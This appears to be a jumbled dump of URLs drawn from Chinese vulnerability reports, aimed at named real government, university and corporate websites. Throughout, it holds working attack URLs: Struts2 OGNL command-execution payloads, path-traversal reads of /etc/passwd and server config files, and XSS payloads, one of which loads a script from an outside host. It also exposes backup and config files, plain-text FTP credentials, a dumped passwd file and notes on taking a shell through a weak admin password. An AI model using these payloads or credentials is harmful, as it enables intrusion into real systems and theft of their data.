http://www.shandong.gov.cn/module/jslib/jquery/jpage/dataproxy.jsp?endrecord=20&perpage=20&startrecord=1 http://news.163.com/11/0329/14/70APFMN400014AEE.html http://news.163.com/12/0604/18/8366392700014AEE.html http://www.chengduair.cc/news2011/newsdate.asp?id=295 http://www.chengduair.cc/news2011/newsdate.asp?id=293 http://www.chengduair.cc/news2011/newsdate.asp?id=294 http://www.chengduair.cc/news2011/newsdate.asp?id=292 http://61.139.73.103/system/uploadFiles.do?operate=fileDownload_is&filepath= http://61.139.73.103/usertree.do?operate=selectDeptTree&time= http://218.106.133.54/ http://www.xmb.com.cn/ http://manager.zt-express.com/PageViews/Login/Login.aspx http://www.zt-express.com/ http://bb.zt-express.com/ http://cx.zt-express.com/ http://crm.zt-express.com/ http://www.wissun.com/index.php?do=news&act=list&pid=411 http://www.wissun.com/index.php?do=news&act=list&pid=411 http://bbs.wwtx.cn/ http://bbs.wwtx.cn/uc_server/data/config.inc.php.bak http://www.wandaperformance.com/ http://www.wandaperformance.com/FileUpload http://www.gzjtw.com.cn/jobview.php?id=164%E2%80%98 http://web.10050.net/ 
http://www.jiakaobaodian.com/ http://www.anta.cn/ http://www.365hrm.com:8080/365hrm/configuration/dologin_single.action http://bjtzyw.gov.cn/ http://demo.zoomla.cn/ http://www.jiankongbao.com/content/edit/XXX http://wh.i3v.cc/采用dedecms5.7,存在变量覆盖漏洞 http://www.58888222.com/ http://wooyun.org/bugs/wooyun-2010-04214 http://video.sina.com.cn/haokan/play.html?url=expla.fhrfitness.com/107/xianzhi http://i.178.com http://wap.17wo.cn/这个网站可以进行密码重置 http://gz.ip66.com/wap/datalist.php http://www.cqpost.com/siteserver/Installer/default.aspx http://www.fhplan.gov.cn/siteserver/Installer/default.aspx http://www.hfxzzx.gov.cn/sscms/siteserver/Installer/default.aspx http://www.wnmc.edu.cn/siteserver/Installer/Default.aspx http://www.ahlxcdc.com/siteserver/Installer/Access.aspx http://nanolab.pku.edu.cn/siteserver/Installer/default.aspx http://www.qfnujiuye.com/siteserver/Installer/default.aspx http://fzxy.sdut.edu.cn/siteserver/Installer/Default.aspx http://www.bmi.ac.cn/siteserver/Installer/default.aspx http://www.zjer.cn/channel/index/ http://jiufang.zdomo.com/ https://xx.xx.xx.x/vpnweb/bulletin.php?para=admin/index.php绕过认证直接访问后台认证,使用burp抓包,得到url地址 https://xxx.xx.xx.xx//admin/device_status.php http://mama.91.com/)合存在SQL注入漏洞 http://mama.91.com:80/DIYApp/diyDetail?id= http://mama.91.com:80/DIYApp/diyDetail?id=* http://www.dayrui.net/fang/index.php http://www.dayrui.net/fang/index.php?c=search&area=2395&catid=1&order=updatetime http://www.dayrui.net/fang/index.php?c=search&area=2395&zujin=0%2C500&catid=1 http://www.dayrui.net/fang/index.php?c=search&area=2395&catid=1 http://www.dayrui.net/fang/index.php?c=search&catid=1 http://www.dayrui.net/video/index.php http://www.dayrui.net/video/index.php?c=search&catid=1&order=updatetime http://www.dayrui.net/video/index.php?c=search&area=%E5%A4%A7%E9%99%86&catid=1 http://www.dayrui.net/video/index.php?c=search&catid=7 http://www.dayrui.net/space/index.php http://www.dayrui.net/space/index.php?order=displayorder 
http://www.dayrui.net/space/index.php?keyword=finecms&order=displayorder http://x.x.x.x/seeyon/management/status.jsp http://x.x.x.x/seeyon/main.do?method=officeDown&filename=c:/boot.ini http://122.156.217.45:8080/seeyon/main.do?method=officeDown&filename=D:/UFSeeyon/A8/Group/ApacheJetspeed/conf/tomcat-users.xml http://x.x.x.x/manager/html http://web.hangzhou.com.cn/money/ http://wizard.stock.hexun.com/zlkpf/photo.aspx?fld_id=8 http://www.sdo.com/common/RedirectAppSite?url=http%3A%2F%2Fkf.sdo.com%2Fsdch%2Findex.asp&name=%E5%AE%A2%E6%9C%8D%E4%B8%AD%E5%BF%83 http://www.sdo.com/common/RedirectAppSite?url=http%3A%2F%2Fwww.snda.com%2F&name=%E5%85%B3%E4%BA%8E%E7%9B%9B%E5%A4%A7%E9%9B%86%E5%9B%A2 http://www.sdo.com/common/RedirectAppSite?url=http%3A%2F%2Fhr.snda.com%2F&name=%E7%9B%9B%E5%A4%A7%E6%8B%9B%E8%81%98 http://www.sdo.com/common/RedirectAppSite?url=http%3A%2F%2Fgmm.sdo.com&name=G%E4%B9%B0%E5%8D%96 http://www.sdo.com/common/RedirectAppSite?url=http%3A%2F%2Fwww.yuncheng.com%2Fbb&name=%E7%9B%9B%E5%A4%A7%E7%94%B5%E5%AD%90%E4%B9%A6 http://ipic.staticsdo.com/external/install_beacon.js http://caipiao.tenpay.com/v1.0/bc.shtml?url=@www.baidu.com http://www.jiankongbao.com/adv_compare.php?crt_id=320&type=comparison http://www.jiankongbao.com/adv_compare.php?crt_id=321&type=comparison http://www.jiankongbao.com/adv_compare.php?crt_id=322&type=comparison http://www.jiankongbao.com/adv_compare.php?crt_id=323&type=comparison http://111.13.51.105:8080/ http://www.spider.com.cn/userJquery.action http://www.tygjj.com/ http://www.csair.com/cn/index.shtml,然后点击服务大厅,接下来点击座位预留下面的查看详情如图 http://218.106.133.143/wms/login.asp http://218.106.133.143/searchorder.asp?page=13&state=2 http://www.jiankongbao.com/maintain/create/XXX http://www.jiankongbao.com/maintain/create/190 http://www.jiankongbao.com/maintain/create/189 http://mis.xinhuanet.com/edz/login.asp http://113.140.70.184:4016/forUI/Policy/showPolicy.aspx?ID=1415376c-e846-412f-b719-ceb1f03fd97f 
http://wish.home.news.cn//index.php?m=search&c=index&a=public_get_suggest_keyword&url=test&q=../../../../etc/passwd http://manage.baison.com.cn:8001/manage/Default.htm https://vpn.cugb.edu.cn http://wd.koudai.com/vshop/1/H5/H5GetCommonItems.php?userid=1 http://shop.wwtx.cn/goods/56 http://bbs.67.com/uc_server http://211.67.48.102/common/BillBack.sh文件,可得数据库配置文件。 http://183.129.178.139:8100/justests/JFolder.jsp http://www.purchase.gov.cn/ http://agent.soufun.com/ForgetPassword.aspx http://www.jxjsjy.com/search/ www.jxjsjy.com http://www.jxjsjy.com http://www.jingwei.com/follow/followuser?uid= http://www.jingwei.com/follow/followuser?uid=7594985 http://www.swmc.org.cn/admin/login.jsp www.gc437.com.cn site:gc437.com.cn.出现“安全联盟提醒您:该页面可能已被非法篡改!” http://www.gc437.com.cn/1.asp http://www.gc437.com.cn/2.asp http://118.114.246.49/admin_set.asp http://www.gc436.com.cn http://teachingdata.com/Admin/ http://video.sina.com.cn/haokan/play.html?url=baidu.com https://file.suibiji.com/att?src=../etc/passwd注册一个号~任意读取文件~~ http://t.sohu.com http://dp.sina.cn/dpool/hdpic/eladies/index.php?ch=3&cid=1&clicktime=1390236749255%3C/script%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E&userid=user13902367492553233335653785616 http://my.gaofen.com/signup/checkUser?type=2&username=admin http://my.gaofen.com/signup/checkUser?type=2&username=admin http://my.gaofen.com/signup/checkUser?type=2&username=admin http://shishi.gaofen.com/?mod=all http://haoma.sogou.com/appeal.html http://haoma.sogou.com http://glxy.mot.gov.cn/BM/index.html http://glxy.mot.gov.cn/BM/CreditAction_corpList.do?corpcode=71752305-2 http://www.sdo.com/go http://www.sdo.com/go#http://www.wooyun.org?sdo.com site:zt-express.com http://kdweibo.com/home http://syxy.mot.gov.cn/credit/index.jsp http://218.29.139.87/index.php http://218.29.139.87:8089/swordfish/wbs/siteDispatherUI!viewRegPerson.action?id=12 http://221.213.44.146:9000/Default.aspx 
http://221.213.44.146:9000/FrmInfoDetail.aspx?Type=ZRZTSGDW&Code=fd5018bc-36d7-49da-b6fa-aaad159b3fba&IsShow=1&SubType=003 http://218.26.163.59:8088/sxztb/ http://218.26.163.59:8088/sxztb/xxfbQueList.action?sy=y&type=12cedc829f91b7516d0000000 http://zhidao.baidu.com/question/80878155.html?qbl=relate_question_3 http://kuaidadi.com/phone/ http://wc.7daysinn.cn:8080/login http://ad.hangzhou.com.cn/admin.asp http://mrp5.7daysinn.cn/PUR101A.Web/Forms/SelectArticleKind.aspx?Name=txtVendorName&TypeId=1%2c3&popup=1&tmp=48 http://jnjpfw.miit.gov.cn/ http://jnjpfw.miit.gov.cn:8080/industryportal/trees/TecInfo.aspx?appid=010f9caf-3cea-4b21-b09a-5bd3aa1c36dd http://inner.7daysinn.cn/FindHotel/Default.aspx https://shenghuo.alipay.com/peerpaycore/tradePeerPayApply.htm?tradeNoList=2014012011001001680018854252 https://shenghuo.alipay.com/peerpaycore/tradePeerPayApply.htm?tradeNoList=2014012011001001680018854255 https://shenghuo.alipay.com/peerpaycore/tradePeerPayApply.htm?tradeNoList=2014012011001001680018854259 http://desk.oa.91.com/login/try?code=tfjt http://biye.jlu.edu.cn/?mod=info&act=view&id=24-1 http://shop.wwtx.cn/index.php?act=views&app=store&id=656864&sid=170 http://womenslife.dahe.cn/ http://ets-ccaa.open.com.cn/login.aspx http://www.025.com:8010/025admin/UserSuggest/BugPost.aspx?id=1 http://t.xcb.sdo.com/admincp/RecommendUsers.aspx http://218.108.73.82/index.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.183gz.com.cn/company/zhw/CONN.ASP http://www.183gz.com.cn/company/zhw/Data/MeQskdyDMS_4DaJta.mdb http://yt.linekong.com/special/newbook/.svn/entries 
http://yt.linekong.com/lottery/.svn/entries http://xy.linekong.com/special/matrix/.svn/entries http://yt2.linekong.com/activity/activation/.svn/entries http://eeye.online.tj.cn/bbonline/zh_cn/genearch/NoticeCenterContent.asp?notice_did=1 http://eeye.online.tj.cn/ http://cloud.189.cn/ http://cloud.189.cn/t/qY3MJzvaaqmm http://write.blog.csdn.net/postlist?t=del&id=这里就是文章的Id http://blog.csdn.net/u013546030/article/details/18705767 http://www.114otc.com/userlist.aspx clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab#version=8,0,0,0 http://stream9.qqmusic.qq.com/12729312.wma|Postcard http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf"/ http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf"/ clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab#version=8,0,0,0 http://xsst.sinaapp.com/Xss.swf http://stream9.qqmusic.qq.com/12729312.wma|Postcard http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf"/ http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf"/ http://xsst.sinaapp.com/Xss.swf index.php/storeHome/axisRight http://www.sdrkjsw.gov.cn/nshow/14257.html http://124.133.3.231:8001/ http://www1.gome.com.cn/这个子域名。 http://www1.gome.com.cn/upload/db.zip http://fj.shenghuoquan.cn/ http://ftp.baison.net:5000/ http://www.sysgsj.gov.cn/xzgg_view.php?act=%B9%AB%B8%E6%B9%AB%CA%BE&id=456 http://www.tcl.com/.svn/entries http://multimedia.tcl.com/en/home/.svn/entries http://bs.center.aoshitang.com/usercenter/userCenter/userManager.action root:x:0:0:root:/root:/bin/rzsh bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin mail:x:8:12:mail:/var/spool/mail:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin 
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin astd:x:500:500::/home/astd:/bin/rzsh mysql:x:501:501::/home/mysql:/bin/rzsh zabbix:x:502:502::/home/zabbix:/bin/false rd:x:503:503::/home/rd:/bin/rzsh agent:x:505:505::/home/agent:/bin/rzsh http://218.242.57.204:20000/ http://211.103.156.32:8021/ http://www.whctp.gov.cn/gqxwco.action?id=20486 http://www.whctp.gov.cn/sec.jsp http://dp.ha.xinhuanet.com/MessageManager/NewMessageShow.aspx?messageID=173 http://ss.linekong.com/article.php?article_id=39&sort_id=44 http://www.lenovostoreapp.com/admin/index.php/3c/sign http://test.pclady.com.cn/.svn/entries http://www.bjsubway.com/e/action/ListInfo/?classid=40&ph=1&station=苹果园 http://hd.kdzz.kongzhong.com/rank/pclogin.php http://hd.kdzz.kongzhong.com/rank/checklogin.php?act=login&callback=jQuery18005518103167414665_1389880232572&password=%C7%EB%CA%E4%C8%EB%C3%DC%C2%EB&username=%5c&_=1389880234466 http://kefu.linekong.com/eService/system/inputLogin.do http://lh.linekong.com/eADUnion/login/index.do http://office.homeinns.com/HCS/ http://e-learning.lenovo.com.cn/user/registration/reseller http://home.verycd.com/cp.php?ac=album&op=editpic&albumid=166749&picid=2827186 http://bbs.sf-express.com/portal.php http://bbs.sf-express.com/config/config_global.php.bak http://home.verycd.com/space.php?uid=19436563&do=mtag&tagid=15625 http://home.verycd.com/space.php?uid=19436563&do=mtag&tagid=15625可加入分组发话题- http://home.verycd.com/space.php?uid=19436563&do=mtag&tagid=15625 http://58.246.233.197/ 
http://58.246.233.197/Smstatistics.aspx?site=5LiK5rW35oC76YOo http://58.246.233.197/Sms/main.htm对各网点短信平台进行基础管理 http://www.xinyuan.com.cn/ http://www.hngp.gov.cn http://www.hngp.gov.cn/xygh/cx/xyindexserch.html?webappcode=H60&keyword=123 http://www.hngp.gov.cn/xygh/egp/jd/dljg/dljgxx/ListDljg,$DirectLink.direct?sp=S1&sp=S00390019 http://home.verycd.com/cp.php?ac=thread&op=digest&tagid=15626&tid=2815255&inajax=1 http://xy001.52xinyou.cn/api/webaction.ashx http://www.lxjx.cn/Lists_type.aspx?BigClassName=考证须知 http://mp.linekong.com/login/login.do URL:http://www.shmetro.com/admin/ http://drops.wooyun.org/papers/548 http://sc.bj.chinamobile.com/ http://sc.bj.chinamobile.com:9090/mscp/ http://sc.bj.chinamobile.com:9091/mscp_wlan/index.jsp http://zz19z.zzedu.net.cn/ http://zz42z.zzedu.net.cn/admin_index.asp的后台。没想到人品爆发。弱口令直接进入了。又因为服务器是iis6的。后台又可以备份。就利用IIS6备份get了shell。进入shell一看。发现全郑州的中学都在这里。。太刁了。 http://www.software.zjut.edu.cn/info.php?id=4147 www.software.zjut.edu.cn下随便一个链接都能射……求轻虐 http://bbs.fumu.com/tj/ad.php?a=56 ftp://xradm:147258369@203.158.19.51 http://career.ecust.edu.cn/zxzxcp/zc_company.php http://career.ecust.edu.cn/zxzxcp/sx_manage.php http://love.hangzhou.com.cn/准备上传靓照寻找真爱 http://log.91.com/index.php/Index/login http://light.91.com/ http://foc.sf-express.com/bbs/login.aspx http://foc.sf-express.com/bbs/admin/global/global_templatesedit.aspx?path=../tools/&filename=xxx.aspx&templateid=1&templatename=Default http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=http://www.baidu.com&showcount=0&desc=baidu&summary=baidu&site=baidu&pics=http%3A%2F%2Fwww.baidu.com%2Fimg%2Fbdlogo.gif%23%22%20onload%3D%22var%20s%3Ddocument.createElement%28%27script%27%29%3Bs.src%3D%27http%3A%2F%2Fxxx.xxx.xxx%2FwowS3i%3F1390008412%27%3Bdocument.body.appendChild%28s%29%3B&style=202&width=105&height=31&otype=share&showcount= http://www.wdshopping.com/search-results.php?id=90&catid=16 http://shop.wwtx.cn/index.php http://shop.wwtx.cn/store/1025207/category/11490/page_%5c 
http://shop.wwtx.cn/index.php?act=index&app=search&keyword=1&page=%5c&Submit=%cb%d1%cb%f7 http://paimai.wwtx.cn/auction.php?act=auction_auto_info&act=auction_auto_info&add_range=50&id=1815 http://shop.hangzhou.com.cn/detail.jsp?CID=0109 http://eb.elong.com/isajax/ForgetPass/GetHotelStaffInfo?Name=admin http://www.pp.cc/manage/sale/newer inurl:/admin.php,想找一下关于Discuz的默认后台信息,结果看到一个选课系统,遂进之 http://cs.whu.edu.cn/thesis/admin.php?act=keti.all&zyid=0&sys=1 http://cs.whu.edu.cn/thesis/ http://cs.whu.edu.cn/thesis/admin.php?act=keti.all&zyid=0&sys=1 http://me.07073.com/ http://hn.whsp.gov.cn/index.action google:Powered http://221.238.**.***:8082/redmine/ http://demo.taodiantong.cn/?do=../../../../../../../../../../etc/passwd%00.jpg&mod=faq http://www.baison.com.cn/manage/web/index.php http://218.242.57.204:8382/ http://target.url/website/dflz/dflzSiteAction!sjList.action?orgCode=140600&issueTypeCode=S_002 http://ygnl.szdflz.gov.cn/website/dflz/dflzSiteAction!sjList.action?orgCode=140600&issueTypeCode=S_002 http://dflz.meizhou.gov.cn/website/dflz/dflzSiteAction!sjList.action?orgCode=441400&issueTypeCode=S_003 http://59.34.3.90/website/dflz/dflzSiteAction!sjList.action?orgCode=441285&issueTypeCode=S_002 http://219.129.166.87/website/dflz/dflzSiteAction!sjList.action?orgCode=140600&issueTypeCode=S_002 http://dflz.maoming.gov.cn/website/dflz/dflzSiteAction!sjList.action?orgCode=440900&issueTypeCode=S_003 http://dwgk.szdflz.gov.cn/website/dwgk/dwgkSiteAction!sjList.action?orgCode=140600&issueTypeCode=S_010 http://www.cwgk.gz.gov.cn/website/dflz/dflzSiteAction!sjList.action?orgCode=440100&issueTypeCode=S_004 http://www.lyairport.net/manage03/index.asp http://www.lyairport.net/about.asp?title=%C1%AA%CF%B5%CE%D2%C3%C7&xs=597 http://www.lyairport.net/hd.asp?title=%C1%D9%D2%CA%BC%F2%BD%E9&xs=618 http://www.lyairport.net/list_news.asp?id=634 http://www.lyairport.net/list_zw.asp?id=667 http://118.144.75.63/login.action http://118.144.75.34/index.action 
http://oa.homeinns.com/OA/Login.aspx?ReturnUrl=%2foa%2f http://zhi.lenovo.com.cn/ http://mail.cpd.com.cn/,使用的是zimbra的邮件系统 http://mail.cpd.com.cn/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 http://mail.gzcb.com.cn/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../opt/zimbra/conf/localconfig.xml%00 http://wizard.stock.hexun.com/tzxy/kk.aspx?teacher=%C0%EE%F6%CE http://www.syhzy.cn/ http://218.106.133.143/sigma/newspre1.asp?seq=23 http://mail.hualala.com/,使用的是zimbra的邮件系统 http://www.exploit-db.com/exploits/30085/ http://mail.hualala.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://ideaclub.lenovo.com.cn/survey/ http://copyright.tudou.com/cpmanage/system/admin-login http://fwpt.sme.gov.cn/ http://fwpt.sme.gov.cn/page/service_item_query.jsp?menuIndex=12 http://spm3.lenovo.com.cn http://spm3.lenovo.com.cn/ewebeditor/uploadfile/20140127194359462.aspx http://spm3.lenovo.com.cn/ewebeditor/admin/default.aspx cn:c4828092ad389b22fcdd568e3dd11a06 http://drops.wooyun.org/papers/548 http://datainfo.stock.hexun.com/hybk/dygs.aspx?fld_areano=323000000 http://product.yesky.com/product/441/441620/maintain.shtml?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,@java.lang.Runtime@getRuntime%28%29.exec%28%27/Applications/Calculator.app/Contents/MacOS/Calculator%27%29 http://218.58.156.220:8002/yxxt/web/zzfw_index.do http://xg.glut.edu.cn:8080/yxxt/web/zzfw_index.do http://yxxt.yngsxy.net:8081/yxxt/web/zzfw_index.do 
http://yx.heuet.edu.cn/yxxt/web/zzfw_index.do http://www.eeti.com.cn/getCompanyIntro.action softcoreonline.huawei.com/front/app!checkMobile.action?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,@java.lang.Runtime@getRuntime%28%29.exec%28%27/Applications/Calculator.app/Contents/MacOS/Calculator%27%29 http://maintain.org.hc360.com/maintain/User/login.action http://maintain.org.hc360.com/maintain/xxxx.jsp http://zhidao.taobao.com/baobei/-713DBCD3B7CABCD3B4F3C4D020C5A3D7D0BFE326773DBCD3B7CABCD3B4F3C4D020C5A3D7D0BFE3.html http://rel.lenovo.com.cn/rel/submit.php http://www.4008266333.com/My97DatePicker/datepicker/skin/whyGreen/direct.aspx PAY:String= http://www.eqjl.gov.cn/main.action http://221.182.104.170:9010/wap/tblLineAction!getLineByStopNo.action?stopNo=CDS&leaveDate=2014-1-28&lineNo=CDS http://221.182.104.170:9010/articles!loadHelps.action已修复,应该是不同的应用吧。 http://183.203.151.62/LoginPage.aspx http://218.204.36.28/license!getExpireDateOfDays.action http://sapel.quantatw.com/newsdetail.php?nno=19 http://i.yinyuetai.com/27902219/blog/detail/780447?page= www.ccgp-shaanxi.gov.cn/download?fileName=../../conf/tomcat-users.xml www.ccgp-shaanxi.gov.cn/download?fileName=WEB-INF/web.xml www.ccgp-shaanxi.gov.cn/download?fileName=../../../../../../../etc/passwd www.ccgp-shaanxi.gov.cn/download?fileName=../../../../../../../../etc/sysconfig/network www.ccgp-shaanxi.gov.cn/download?fileName=../../../../../../../../etc/services http://baa.bitauto.com/bora/thread-5088548-3.html#43078421 http://tv.sohu.com/s2014/msyh/index.shtml),登陆搜狐账号,再次打开活动页面,点击“立即订购” http://116.228.55.12/做案例,注入点: http://bl.gamebbs.qq.com/ http://bl.gamebbs.qq.com/uc_server/ http://www.cq.gov.cn/publicinfo/web/views/Show!index.action http://fwpt.sme.gov.cn/page/query.do?method=getInfoDetail&id=30 http://fwpt.sme.gov.cn/assistant/admin/admin_main.jsp?menuIndex=22 
http://beijing.ganchang.cn/ http://beijing.ganchang.cn/categorylist/index.html?id=23%27 http://wooyun.org/bugs/wooyun-2013-045893 http://61.191.25.190:8080/osm2/ http://61.191.25.190:8080/osm2/adminInfo!login.action http://ue.feixin.10086.cn/ http://ue.feixin.10086.cn/vote/myExper.action http://www.yinyuetai.com/fanclub/topic-detail/268262 http://www.yinyuetai.com/fanclub/create-fan-topic-reply http://t.cn/8FJAIp9 http://code.google.com/p/google-glass-api/issues/detail?id=391 http://www.whctpasc.gov.cn/Broadcast/Broadcast.aspx?type=InfoBLLChT&title=%B2%A2%C1%AA%C9%F3%C5%FA%C1%F7%B3%CC%CD%BC http://www.whsfzb.gov.cn/Broadcast/broadcast.aspx?type=ZXWJ&page=2 http://www.wdaac.cn/Broadcast/broadcast.aspx?type=infovide&page=2 http://www.whgqjjjc.gov.cn/Broadcast/Broadcast.aspx?type=jzcm http://www.sdsp.cn/Broadcast/Broadcast.aspx?type=ZXDT_ZhXXW&title=%D6%D0%D0%C4%D0%C2%CE%C5 http://www.bnzw.gov.cn/Broadcast/Broadcast.aspx?type=infogsgg http://www.shspzx.gov.cn/Broadcast/Broadcast.aspx?type=qsydw http://222.135.78.34:8085/Broadcast/Broadcast.aspx?type=xxgg http://222.135.78.34:8089/Broadcast/broadcast.aspx?type=ZXDT_ZhXXW&page=2 http://www.mgxzfw.gov.cn/broadcast/broadcast.aspx?type=infotpxw http://www.nbjdzw.gov.cn/Broadcast/Broadcast.aspx?type=spbz http://www.yongtai.gov.cn:8080/LangChao.ECGAP.OutPortal/Broadcast/Broadcast.aspx?type=InfoTPXW http://jnsp.qingdao.gov.cn/Broadcast/Broadcast.aspx?type=xxgg http://www.5210.cn/Broadcast/Broadcast.aspx?type=infozwgk http://www.lxxzfw.com/Broadcast/Broadcast.aspx?type=grb http://www.bzxzspzx.gov.cn/Broadcast/Broadcast.aspx?type=InfoZWGK_gzzd http://shenpi.xiangxian.gov.cn/Broadcast/Broadcast.aspx?type=InfoGKZN http://www.xtsxzfw.gov.cn/BroadCast/broadcast.aspx?type=ysba http://www.lyxzfwzx.gov.cn/Broadcast/Broadcast.aspx?type=grb http://60.6.212.230:8090/Broadcast/Broadcast.aspx?type=grb http://www.sdrcjjjc.gov.cn/Broadcast/Broadcast.aspx?type=jyjl http://www.bxxxzfwzx.gov.cn/Broadcast/Broadcast.aspx?type=xxgg 
http://www.wdjjjc.gov.cn/Broadcast/Broadcast.aspx?type=zxxw http://www.sqdzjc.gov.cn/Broadcast/Broadcast.aspx?type=infoTSJJ&parentType=infoTSJJ https://ebooking.ctrip.com/hotel-supplier-ebookinglogin/EbookingLogin.aspx http://i4.imgs.letv.com/.svn/entries http://bureau.cctv.com/register.php http://bureau.cctv.com/ziliaoku.php?z_id=89 url:gtp.sme.gov.cn http://202.85.212.150/jszx/index.action http://zwdt.tz.gov.cn/riseapprove_web/admin.jsp http://58.221.162.227:9080/riseapprove_web/bmsltxDetail.do baidu:cms/app/info/ http://www.wlyz.net/cms/app/info/doc/index.php/25957* http://www.cpecartoon.com/Admin/index.aspx http://jjdsdc.com/ http://jjdsdc.com/System http://www.snciq.gov.cn:6198/car/login.action http://125.72.14.80/ http://dellcqg.renren.com/Qa/ask http://www.mothercj.yst.com.cn/app/yy_home.action http://www.fzcj.com/News_list.aspx?title=1 http://www.fzcj.com/FxsShouyi.aspx?pid=3 http://drops.wooyun.org/papers/548 http://jwmis.hhtc.edu.cn/ZNPK/Private/list_xnxqkc_js_skbj.aspx?id=1 http://jwmis.hhtc.edu.cn/ZNPK/Private/list_xnxqjxjckc_skbj.aspx?id=1 inurl:member/index.php?ugid31=51 http://pinyin.sogou.com/dict/ywz.zip http://www.ztdq2.com:99/index.asp?id=228 ftp://61.143.169.61 http://www.fecb.com.cn/TV_photo.asp?sId=17001 http://sharpshooter.yesky.com/ http://www.tyxd.gov.cn/gov/private/login.action http://127.0.0.1/admin/databack/sql/metinfo_met_20140202_ixzlfo_1.zip http://127.0.0.1/admin/databack/sql/metinf~1.zip http://www.hikvision.com/ http://avic-sae.com.cn/NewsParticular.aspx?info_id=1470 www.alumnipower.net http://weibo.com/u/3022690473# http://system.greentree.com.cn:8080/op/module_erp/user.txt www.wooyun.org www.wooyun.org www.wooyun.org http://www.casm.ac.cn/ http://www.casm.ac.cn/kjcx.php?col=95&file=3036 http://www.casm.ac.cn/index2.php?col=14&file=4795 http://www.casm.ac.cn/yjygk.php?col=88&file=1&onlyOne=1 http://www.casm.ac.cn/news.php?col=93&file=4846 http://www.casm.ac.cn/ztbd.php?col=132&file=2273 
http://www.casm.ac.cn/kjcj.php?col=120&file=1891&onlyOne=1 http://www.casm.ac.cn/cgzh.php?col=101&file=3801&onlyOne=1 http://www.casm.ac.cn/yjdw.php?col=28&file=1739&onlyOne=1 http://www.casm.ac.cn/kyzc.php?col=34&file=241&onlyOne=1 http://www.casm.ac.cn/yjpy.php?col=37&file=3690 http://www.casm.ac.cn/zcfg.php?col=112&file=1713 http://training.cnca.cn/cms/whatycms/ArtiSearch.do http://www.ngmzj.gov.cn/htmlpages/news.asp?id=1747 http://tieba.baidu.com/f/commit/share/openShareApi?url=http%3A%2F%2Fshare.baidu.com%2F%230-tieba-1-78014-7eff13ea8df1a334a227e1223f8d0dd3&title=%B0%D9%B6%C8%B7%D6%CF%ED%A3%AC%CE%AA%C4%FA%B4%F8%C0%B4%B8%FC%B6%E0%C1%F7%C1%BF%20-%20%B0%D9%B6%C8%B7%D6%CF%ED&desc=&comment= http://tieba.baidu.com/f/commit/share/openShareApi?url=http%3A%2F%2Fwww.baidu.com&pic=http://www.google.com/images/srpr/logo11w.png http://iservice.qiaqiafood.com:8003/ http://study.dlteacher.com/ http://bj.wo.com.cn/xysz/llmm.action http://vendor.wanda.cn/signup/index.action http://www.eeb.cn/youth/plug/book.asp?t0=WCRTESTINPUT000000&t2=WCRTESTINPUT000001&t4=WCRTESTINPUT000002&t1=WCRTESTTEXTAREA000003&t3=0 http://hdsyxx.net:85/phpinfo.php http://ftds.idin.ac.cn/cn/index.do http://news.gdredcross.org.cn/web/news_view.asp?id=1948 http://lohohd.juran.com.cn/frontIndex.do http://www.jinyuan.gov.cn/jyq/private/login.action http://www.tyxd.gov.cn/gov/private/login.action http://jcxt.htinns.com/WebResource.axd?d=GecXR2RIyY_JNr******2&t=634******** http://jcxt.htinns.com/WebResource.axd?d=GecXR2RIyY_JNrCvsOavmQ2 